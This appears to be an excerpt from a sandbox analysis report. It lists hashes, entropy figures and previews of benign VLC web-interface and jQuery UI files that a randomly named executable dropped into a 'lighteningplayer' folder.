                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:yionv//thPlEbtqNlgFrkUnJBfn0ldFBXGuQBAgW3/Vp:6v/lhPGu61n/fWUAd3dp
                                                                                                                                                                                      MD5:C612FB4B1C7824A0D6ADE9AFAD391C01
                                                                                                                                                                                      SHA1:1331B2A5E54319A575E6ECF90C8187CF0F373FA6
                                                                                                                                                                                      SHA-256:46F39D964785147C69C5EF4495977C1285984A1D99AA087D650036EC6BCE8234
                                                                                                                                                                                      SHA-512:612365E28208B7E038BC726E09E068E2D70E19041B609A2D3738D39DF02255702931DB332783365DF5199927182147FD60556A08A6872282B708125EEBAD33A7
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: .PNG........IHDR.......d.....G,Z`...EIDAT.W.N... .B._...@#......@.U.FE.G@Z0..`..`..-.........Z.5...._..6.-...DW....IEND.B`.
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_222222_256x240.png
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:PNG image data, 256 x 240, 8-bit colormap, non-interlaced
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4194
                                                                                                                                                                                      Entropy (8bit):7.774193064913481
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:j0bmHMnm8AI8QOn+GUAOngEJPhH267qHfheCWYunxnIciUaJfI:gYAmnIoygEthHX7qHfilxjqw
                                                                                                                                                                                      MD5:483882A616C9857723899FC394E07724
                                                                                                                                                                                      SHA1:3A1BBE8FFEF42C999B26B2D4BED4A4690A1E9E3B
                                                                                                                                                                                      SHA-256:7AD54E50835A67EFBB2E9694E73D24A5DD9545DF297AFB1569992E0247ACC32C
                                                                                                                                                                                      SHA-512:F02A6A9C1AC0A9CE4E02427A75AFA4F864D571CDF57DBA988C0CC8BDEECC79846AFC5B8B90EB40C9BFD74C8E261E2D646968A1F4E779E0FDF96AD41F591467CC
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: .PNG........IHDR..............IJ.....PLTE$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$......NtRNS...2..P...."Tp@f`.... <.BHJ.Z&0R,.4...j...8D...|.......(..$......b...l.F>n~.hh.H.....IDATx..].c....j.-kI.Zk2{.lk.n..-..tI......@....%Z2-.....|.>....H....... ......l\=.a.%f@.<,!..A....C.u..[.l...`....j...m.$..).w."..n_..Y..U....r.A.4 .5...2..v.8.`...........*0...I....;w..........(....@r.........n...e?HZ..p.]..........B..R.E........'@...A.!..........8\DR.P...5pp...5....d..X....a.7....&.k..}..........n.......p...OP.k.J...6..9.....b.w.....}.`.......".*.N.1.I............^..v..1. .o....:<..Up.7x..a.0..C&.l@N.a.;...h..}..q.."..G..n.DoH.....@D........&........*6_....!.....t.......U`....yX...\..5.:.3.B...~,E...#...D....D3.h(.k.X....D...,.@.?..3/WB.x8.8..X...;.q...F..... ......[.X
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_228ef1_256x240.png
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:PNG image data, 256 x 240, 8-bit colormap, interlaced
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5103
                                                                                                                                                                                      Entropy (8bit):7.8639695893598764
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:Z5bYx5D/FqAkMBSNy3QUssDAv5jBvGJHwegc3xrfBUEETJRxoXGImDEwnC3L:38DtqfMBOy3QUsskv5wJHLgc3xr6EETA
                                                                                                                                                                                      MD5:9298AEDA82B7E456B4627E7F7876C72B
                                                                                                                                                                                      SHA1:7D7A0C57EF6D0C0C2E6899DECEAA190E05CC1EAB
                                                                                                                                                                                      SHA-256:3D9EF9C36B2407D3766FD183927E2778A1E4ABAAF2233910453BAFAF76E1F3DB
                                                                                                                                                                                      SHA-512:3AECCED36D3F43F870E02F7B61675F1597119FAB2211DDC7A38F6CDFE86D3B99E2E27F10851968A72B009D9322FC5102C364B4053753E73CBD52F9C205057ACA
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: .PNG........IHDR..............Nzo....PLTE$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..A .....NtRNS...2..P...."Tp@f`.... <.BHJ.Z&0R,.4...j...8D...|.......(..$......b...l.F>n~.hh.H....cIDATx..]k{.6.~....)..S+n..6..mw;.d.q.n.....?g>.$q%u.$.8~.. ......... ...A.....?lY..:6../.].>V..@b. ...'.x.....j..(.............D....1.p$.`....0...`.........Z..v....B...mG.<7.atJ... .=.F..LMr........ A...Sc.L.I...+...mk..N..R....5T...?..4..5mX.m.s`J.).V3.=..B.m.e..N.S...b. .h..%..:.}...CJP..N+b...h.M........1......H..5.3.iVP.k.:2.M.._...L..(X`...q..W..;r....,c.1.....+......X...%..7..d..(X.e....f%...c".4.*...[..R>w.W0..}W ..p.C..ST.q.Q.......E..(..].5...k.~.3$.).........E.a.......5n..u...<...k...Z.<...~.V.5i .C...A.7.-...O...%.{..G...(b7..]..x.~.............H}...Oj.0iMev...kc.ZMe..t..
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_ef8c08_256x240.png
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:PNG image data, 256 x 240, 8-bit colormap, non-interlaced
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4194
                                                                                                                                                                                      Entropy (8bit):7.792848069193123
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:+0bmHMnm8AI8QOn+GUAOngEJPhH267qHfheCWYunxnIciUaJfI:xYAmnIoygEthHX7qHfilxjqw
                                                                                                                                                                                      MD5:4284546507EDEED79552E7E3CF6CBE66
                                                                                                                                                                                      SHA1:60213B56C68D6253BB1941BCEEA7899608FA0901
                                                                                                                                                                                      SHA-256:40A22C997402DDB59E9E344C2D0A8C4CAFE64CF4B103584208863EEC05DFA897
                                                                                                                                                                                      SHA-512:A4B86D331365629619F95391CF63FF97EF431CDF579496C716A8E10370E2FD7908C5AF5AA3EFC6B3DD93136D590C8B56B2E9837E768D97EFCAEB2457F7986D4C
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: .PNG........IHDR..............IJ.....PLTE..............................................................................................................................................................["....NtRNS...2..P...."Tp@f`.... <.BHJ.Z&0R,.4...j...8D...|.......(..$......b...l.F>n~.hh.H.....IDATx..].c....j.-kI.Zk2{.lk.n..-..tI......@....%Z2-.....|.>....H....... ......l\=.a.%f@.<,!..A....C.u..[.l...`....j...m.$..).w."..n_..Y..U....r.A.4 .5...2..v.8.`...........*0...I....;w..........(....@r.........n...e?HZ..p.]..........B..R.E........'@...A.!..........8\DR.P...5pp...5....d..X....a.7....&.k..}..........n.......p...OP.k.J...6..9.....b.w.....}.`.......".*.N.1.I............^..v..1. .o....:<..Up.7x..a.0..C&.l@N.a.;...h..}..q.."..G..n.DoH.....@D........&........*6_....!.....t.......U`....yX...\..5.:.3.B...~,E...#...D....D3.h(.k.X....D...,.@.?..3/WB.x8.8..X...;.q...F..... ......[.X
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_ffd27a_256x240.png
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:PNG image data, 256 x 240, 8-bit colormap, non-interlaced
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4194
                                                                                                                                                                                      Entropy (8bit):7.798227360199842
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:k0bmHMnm8AI8QOn+GUAOngEJPhH267qHfheCWYunxnIciUaJfI:nYAmnIoygEthHX7qHfilxjqw
                                                                                                                                                                                      MD5:DAB711FCB4A9AC4C4E7A03B78067190B
                                                                                                                                                                                      SHA1:186EB155681076F159E25B34464A22637205BAAB
                                                                                                                                                                                      SHA-256:1BD643299F5A35060C7057DC76B4A2138CF3723A2ED5F98A25F9C9A954EACED6
                                                                                                                                                                                      SHA-512:22F1976ACC2B2F177B83013C7751F5F49B3A10DBDB671D3ECA2E1DCDC60A9D07C90A2E6101B046CC8CAEFCA610B2DA439B7DBCFC9CB19176DD5974425A31091A
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: .PNG........IHDR..............IJ.....PLTE..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|......NtRNS...2..P...."Tp@f`.... <.BHJ.Z&0R,.4...j...8D...|.......(..$......b...l.F>n~.hh.H.....IDATx..].c....j.-kI.Zk2{.lk.n..-..tI......@....%Z2-.....|.>....H....... ......l\=.a.%f@.<,!..A....C.u..[.l...`....j...m.$..).w."..n_..Y..U....r.A.4 .5...2..v.8.`...........*0...I....;w..........(....@r.........n...e?HZ..p.]..........B..R.E........'@...A.!..........8\DR.P...5pp...5....d..X....a.7....&.k..}..........n.......p...OP.k.J...6..9.....b.w.....}.`.......".*.N.1.I............^..v..1. .o....:<..Up.7x..a.0..C&.l@N.a.;...h..}..q.."..G..n.DoH.....@D........&........*6_....!.....t.......U`....yX...\..5.:.3.B...~,E...#...D....D3.h(.k.X....D...,.@.?..3/WB.x8.8..X...;.q...F..... ......[.X
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_ffffff_256x240.png
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:PNG image data, 256 x 240, 8-bit colormap, non-interlaced
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4194
                                                                                                                                                                                      Entropy (8bit):7.7655320771907395
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:e0bmHMnm8AI8QOn+GUAOngEJPhH267qHfheCWYunxnIciUaJfI:RYAmnIoygEthHX7qHfilxjqw
                                                                                                                                                                                      MD5:8B65D0BD69D25F6E4928D281B8B18F79
                                                                                                                                                                                      SHA1:FE83D47A2A6CA61B6AE9997C4FAFB12738A282B7
                                                                                                                                                                                      SHA-256:FDCB90174D3B2F5CB8B7A4205E60119419C728C1C76E5A2573AAA8058B6DD3A1
                                                                                                                                                                                      SHA-512:B3F4881B3F1BC9443F64E1C9B5D776AE48403368955826A05FF53F10E50236C4D9D5869785C2FD8EBCEAE720364F9F34E2E82779A1254B037A054E529399FD15
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: .PNG........IHDR..............IJ.....PLTE....................................................................................................................................................................................................................................................NtRNS...2..P...."Tp@f`.... <.BHJ.Z&0R,.4...j...8D...|.......(..$......b...l.F>n~.hh.H.....IDATx..].c....j.-kI.Zk2{.lk.n..-..tI......@....%Z2-.....|.>....H....... ......l\=.a.%f@.<,!..A....C.u..[.l...`....j...m.$..).w."..n_..Y..U....r.A.4 .5...2..v.8.`...........*0...I....;w..........(....@r.........n...e?HZ..p.]..........B..R.E........'@...A.!..........8\DR.P...5pp...5....d..X....a.7....&.k..}..........n.......p...OP.k.J...6..9.....b.w.....}.`.......".*.N.1.I............^..v..1. .o....:<..Up.7x..a.0..C&.l@N.a.;...h..}..q.."..G..n.DoH.....@D........&........*6_....!.....t.......U`....yX...\..5.:.3.B...~,E...#...D....D3.h(.k.X....D...,.@.?..3/WB.x8.8..X...;.q...F..... ......[.X
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\jquery-ui-1.8.13.custom.css
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):33568
                                                                                                                                                                                      Entropy (8bit):5.0902181863183324
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:YOk7f/fb9PJgtTMH3/7oVWMW9uNxJz80JY/I:Y7/fbxJiYHv7oo4h8P/I
                                                                                                                                                                                      MD5:D83B5710E199AB81F64725CF2B7ED90E
                                                                                                                                                                                      SHA1:029959F874875F35095AEC85F6CB625A6DD51F1D
                                                                                                                                                                                      SHA-256:272013C17922C5142893BEB0655D6FE411C4F77B2A8140B4C35A4DB49AC0A8B5
                                                                                                                                                                                      SHA-512:E765CB6265B84DA9D1E32597EE65DBD9709082BDFD35E394080B5A62EB5EB0111F1771AFC52E52D131141EDD59A5D3F326DE2051C5209AB7AE827FE02FD3EC49
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: /*.. * jQuery UI CSS Framework 1.8.13.. *.. * Copyright 2011, AUTHORS.txt (http://jqueryui.com/about).. * Dual licensed under the MIT or GPL Version 2 licenses... * http://jquery.org/license.. *.. * http://docs.jquery.com/UI/Theming/API.. */..../* Layout helpers..----------------------------------*/...ui-helper-hidden { display: none; }...ui-helper-hidden-accessible { position: absolute !important; clip: rect(1px 1px 1px 1px); clip: rect(1px,1px,1px,1px); }...ui-helper-reset { margin: 0; padding: 0; border: 0; outline: 0; line-height: 1.3; text-decoration: none; font-size: 100%; list-style: none; }...ui-helper-clearfix:after { content: "."; display: block; height: 0; clear: both; visibility: hidden; }...ui-helper-clearfix { display: inline-block; }../* required comment for clearfix to work in Opera \*/..* html .ui-helper-clearfix { height:1%; }...ui-helper-clearfix { display:block; }../* end clearfix */...ui-helper-zfix { width: 100%; height: 100%; top: 0; left: 0; position: absolute;
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\custom.lua
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):507
                                                                                                                                                                                      Entropy (8bit):4.741685073790922
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:6:lcsXoMIpELRjPurJYT0CX2UT4DGXYjG7cNeKsLkL3dMWsbQZ/OEZ8VT:lcs4MIpSkr2T0DUTRYy0eKhLtz0gcT
                                                                                                                                                                                      MD5:A0771B01A8C5F79CD6A330BCA0D1B4E3
                                                                                                                                                                                      SHA1:F8BB4DBDBC3EEE3B1A3A447C01D057036FF6BB83
                                                                                                                                                                                      SHA-256:F3CCBE2E1B92486F7C9E3197C1059CD5A8894536006A79D4BB67ACA3A87D73E1
                                                                                                                                                                                      SHA-512:433D2A3892BA9E740CAE1708E740E3FCB317A7BD409F39608B1D6F183089984D0DD18D5D3B2226F70FE102AD20572E4D340D259FAD25D05AC8F1C6E11F3EA41C
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: -- make xgettext fetch strings from html code..function gettext(text) print(vlc.gettext._(text)) end....local _G = _G..module("custom",package.seeall)....local dialogs = setmetatable({}, {..__index = function(self, name).. -- Cache the dialogs.. return rawget(self, name) or.. rawget(rawset(self, name, process(http_dir.."/dialogs/"..name)), name)..end})...._G.dialogs = function(...).. for i=1, select("#",...) do.. dialogs[(select(i,...))]().. end..end...._G.vlm = vlc.vlm()..
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\batch_window.html
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):889
                                                                                                                                                                                      Entropy (8bit):5.341534437936003
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:L4vQxfwhILT3K4C8U9ILGTpQEoDwPNDRILCwHMPeoKenHYa8vSy/jGL6oihTl:Sh69C8LLqpXPNDR6+2ojHdry/jmb4x
                                                                                                                                                                                      MD5:F32AE14CA9D7673EBB23FC827D78076F
                                                                                                                                                                                      SHA1:FF5BFF0318296A910740411201CB8A4CA206B608
                                                                                                                                                                                      SHA-256:5189CDB57F5B2E8C3ADD7E6C4487F5CF8A018508C612F35C8E1305512F2176E8
                                                                                                                                                                                      SHA-512:F5E1994188C34753CDC0DC5143DCDF66A86E56B3A040C1F4B67F01FE5D443FA52F05ABFDB8717E051284E5697D4A0AC5F46D2AE36B2C518C0D5A96358F5B0F67
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: <script type="text/javascript">..//<![CDATA[...$(function(){....$('#window_batch').dialog({.....autoOpen: false,.....width: 600,.....modal: true,.....buttons:{......"<?vlc gettext("Send") ?>":function(){.......var cmds.=.$('#batchCommand').val().split("\n");.......for(var i=0;i<cmds.length;i++){........cmds[i].=.cmds[i].replace(/^#.*$/,'\n');.......}.......cmds.=.cmds.join(";").replace(/\n/g,';').replace(/;+/g,';').replace(/^;/,'');.......sendVLMCmd(cmds);.......$(this).dialog('close');......},......"<?vlc gettext("Cancel") ?>":function(){.......$(this).dialog('close');......}.....}....});...})..// ..</script>..<div id="window_batch" title="<?vlc gettext("VLM Batch Commands") ?>">..<textarea id="batchCommand" cols="50" rows="16">..<?vlc gettext("#paste your VLM commands here") ?>....<?vlc gettext("#separate commands with a new line or a semi-colon") ?>..</textarea>..</div>..
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\browse_window.html
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1217
                                                                                                                                                                                      Entropy (8bit):5.199702365788424
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:L4q7Qxr1QTXIL/Mc1L0foHDK/Mc1LvFF0pFxZjzwUJsLipDTXe/aooRT6hDmLTwg:pTX6UG0AHDKUGvFF0pFx18UJsLipPwa5
                                                                                                                                                                                      MD5:78F476640B27ADFDCFE6E26EDF4CC7E6
                                                                                                                                                                                      SHA1:414D54995CC46FCF5A12B826DF9B8F6F2BE21100
                                                                                                                                                                                      SHA-256:D93C774A7AEB4594F56B37E81838BA03B6855C2BBD91EB8CB803DBD413C5E571
                                                                                                                                                                                      SHA-512:DAEDDD3974908FA314D072B37ACCAF3DC0F3AB694FCD8ACDE02A77176D54710FC9115C2AB915B3B063FE3EA89308CEE9E3FD67DA1641735027AF74FC6BB8080F
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: <script type="text/javascript">..//<![CDATA[...var browse_target..=.'default';...$(function(){....$('#window_browse').dialog({.....autoOpen: false,.....width: 600,.....height: 650,.....modal: true,.....resizable: false,.....buttons: {......"<?vlc gettext("Open") ?>":function(){.......$('li.ui-selected','#browse_elements').each(function(){........$(this).dblclick();.......});......},......"<?vlc gettext("Enqueue") ?>": function() {.......$('li.ui-selected','#browse_elements').each(function(){........var path.=.this.getAttribute('opendir') ? this.getAttribute('opendir') : this.getAttribute('openfile');........switch(browse_target){.........default:..........sendCommand('command=in_enqueue&input='+encodeURI(path));..........setTimeout(function(){updatePlayList(true);},1000);..........break;........}.......});.......$(this).dialog("close");......},......"<?vlc gettext("Cancel") ?>" : function(){.......$(this).dialog("close")......}.....}....});...});..// ..</script>....<div id="window_br
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\create_stream.html
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):14859
                                                                                                                                                                                      Entropy (8bit):5.1924204464409645
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:jvlSM2AtdS0E2jSC+J3kuC6qSSSKyf+yO3zy6CGuGek+3LbnAilKyc7aSCWM2kco:jvlIATE2jJAhuDqx3J0vHEF
                                                                                                                                                                                      MD5:C38A93AE302612A55CCF7F11BDB79C37
                                                                                                                                                                                      SHA1:F6064E146909323276C6C43410F314666E35B5A4
                                                                                                                                                                                      SHA-256:FDFC3417223B88D2E8F0421CED4711760AB11A3C18A50DC05B805A0F4F1A5134
                                                                                                                                                                                      SHA-512:9C38A52C10455FFA179F0BAD0D09D50DEFDDAD25D850248A4A15EBF5AEFBE0165E12EE7EACE516CED181362062B7651C9F246C4A1C77A6DA867BC8AD978D56BE
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: <script type="text/javascript">..//<![CDATA[...$(function(){....$('#stream_out_method').change(function(){.....$('#output_options').empty();.....switch($(this).val()){......case 'file':.......var options.=.$('#file_options').clone();.......break;......case 'http':.......var options.=.$('#net_options').clone();.......break;......case 'mmsh':......case 'rtp':......case 'udp':.......var options.=.$('#net_options').clone();.......$('#stream_out_file_',options).val('');.......break;.....}.....$('[id]',options).each(function(){......$(this).attr('id',$(this).attr('id').substr(0,$(this).attr('id').length-1));......$(this).attr('name',$(this).attr('name').substr(0,$(this).attr('name').length-1));.....});.....$(options).css({......'visibility':'visible',......'display':'block'.....}).....$(options).appendTo('#output_options');....});....$('#stream_out_mux').change(function(){.....if($(this).val()=='ffmpeg'){......$('#stream_out_mux_opts').val('{mux=flv}');.....}else{......$('#stream_out_mux_opt
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\equalizer_window.html
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1334
                                                                                                                                                                                      Entropy (8bit):5.368932485618988
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:L42D21QxomBDSg1ILk1LJK4DyNNooAisuDr0IILOw46ZrIDbH9EaDb6HwMPaKZtV:aCSg16OJ5D0S8suDoI6xZcDD9EaDwy/y
                                                                                                                                                                                      MD5:06AC4C0CD41F6D82FBF3AC0053567295
                                                                                                                                                                                      SHA1:5DDBF4E9F947A42819E00C3B5801EDE0839ECF4B
                                                                                                                                                                                      SHA-256:62CAC570011B9B07E0F421612571A1CE663E49DD3B90A16CF31D8855F1ADDDAC
                                                                                                                                                                                      SHA-512:32DDF815FF7DE04562ED71A0F2484770BC03A4730662A35CD93C42F0771742D0DDCE1292CC96BEA06251C97380291A54E9B89563CF078B36B684B58DCBF7EA72
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: <script type="text/javascript">..//<![CDATA[...var bands.=.new Array('60Hz','170Hz','310Hz','600Hz','1kHz','3kHz','6kHz','12kHz','14kHz','16kHz');...$(function(){....$('#window_equalizer').dialog({.....autoOpen: false,.....height: 650,.....width: 500,.....resizable: false,.....buttons:{......"<?vlc gettext("Reset") ?>":function(){.......$('.eqBand').each(function(){........$(this).slider('value',0);........sendEQCmd({.........command:'equalizer',.........val: 0,.........band: $(this).attr('id').substr(2)........}).......});........},......"<?vlc gettext("Close") ?>":function(){.......$(this).dialog("close");......}.....}....});....$('#preamp').slider({.....min: -20,.....max: 20,.....step: 0.1,.....range: "min",.....animate: true,.....stop: function(event,ui){......$('#preamp_txt').empty().append(ui.value+'dB');......sendEQCmd({.......command:'preamp',.......val: ui.value......}).....},.....slide: function(event,ui){......$('#preamp_txt').empty().append(ui.value+'dB');.....}....});...})
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\error_window.html
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):501
                                                                                                                                                                                      Entropy (8bit):5.114420962466138
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:12:EqJmDwQ2Sz/vtceyMixwINiIIL/+LCDsX6YMPYvw2bsLbm538zP/:L0wQx/FxUr0IILqCwqYMPYvtoPKC/
                                                                                                                                                                                      MD5:AD9769B13838D62653857FF47718C6C0
                                                                                                                                                                                      SHA1:A4683573D5B43ACA9E256D4A45DC5AC46DB927ED
                                                                                                                                                                                      SHA-256:75D1A1AB807CD97801BC37ED547B26C7B357497E82D01221AC064497C9480304
                                                                                                                                                                                      SHA-512:58A7D9CE56936DA79A8F46F0F5C1E465D63EE1B8F68701627FFA00E1C43267899A64A3DFE601BF660BFEE66B5EA365A27BA8D68F7D598AB6E3A917B52D6E9FC0
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: <script type="text/javascript">...$(function(){....$('#window_error').dialog({.....autoOpen: false,.....width:400,.....modal: true,.....buttons:{......"<?vlc gettext("Close") ?>":function(){.......$('#error_container').empty();.......$(this).dialog('close');......}.....}.....});...})..</script>..<div id="window_error" title="<?vlc gettext("Error!") ?>">...<div class="ui-state-error"><div class="ui-icon ui-icon-alert"></div></div>...<div id="error_container" class="ui-state-error"></div>..</div>..
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\mosaic_window.html
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5078
                                                                                                                                                                                      Entropy (8bit):5.334944394253884
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:9ODRbniQxE7XrCubCMJrhfrHlUdBrDjdjosn:9ckYaXruMLblSBrD5josn
                                                                                                                                                                                      MD5:FBD60881FF01355E0ACF55AE6EC77580
                                                                                                                                                                                      SHA1:2B9B99F754BD7B85789A3AD6D3E4965C59093627
                                                                                                                                                                                      SHA-256:E474CA66E17ECAD86FDECD0FF4DB1EFF7EEE70083C2CB30498F81BCE71D03E18
                                                                                                                                                                                      SHA-512:1DDFEED4B0530B9C8606B6D0E53D656ED19213AFAC2D16D13D8BD9BF159E6883FC2EA943D5C5044579A51B11C98B6854CECA8C6E44796C5C511CA83250F60CF0
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: <script type="text/javascript">..//<![CDATA[...$(function(){....$('#window_mosaic').dialog({.....autoOpen: false,.....width: 800,.....maxWidth: 1000,.....minWidth: 800,.....minHeight: 500,.....modal: true,.....buttons: {......"<?vlc gettext("Create") ?>": function() {.......$(this).dialog("close");......},......"<?vlc gettext("Cancel") ?>" : function(){.......$(this).dialog("close")......}.....}....});....$('#mosaic_bg').resizable({.....maxWidth: 780,.....ghost: true....});....$('#mosaic_tiles').draggable({.....maxWidth: 780,.....handle: 'h3',.....containment: [13,98,99999999,99999999],.....drag:function(event,ui){......var xoff.=.ui.offset.left - $('#mosaic_bg').offset().left;......var yoff.=.ui.offset.top - $('#mosaic_bg').offset().top-17;......$('#mosaic_xoff').val(xoff);......$('#mosaic_yoff').val(yoff);.....}....});....$('input','#mosaic_options').change(setMosaic);....setMosaic();...});...function setMosaic(){....var rows.=.Number($('#mosaic_rows').val());....var cols.=.Number($(
C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\offset_window.html
Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
File Type:HTML document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1942
Entropy (8bit):5.202761977992723
Encrypted:false
SSDEEP:48:o46dnco/akUXU3Hniag/akfaniig/akn4L6p9FQL:MnjakUXU3nhOakfanFOaknk0XQL
MD5:BE2110A67187E5529B0B5C264D64FF2C
SHA1:4B5D5F7C1AC90AD298C47323AA3E07548B9096A5
SHA-256:F0C8450D88F4A64396304652811C3B9D215B9CCEB24C36A0753042E68A688AB5
SHA-512:7C305A2C9375F24E769A292D960F8E38EA4CF934AA3DE2F80620BADC6B20D68AB07ADFE77840105D8721299BC3BE794A27B1FC33E54C10F0B3FE52AB5DE13BA9
Malicious:false
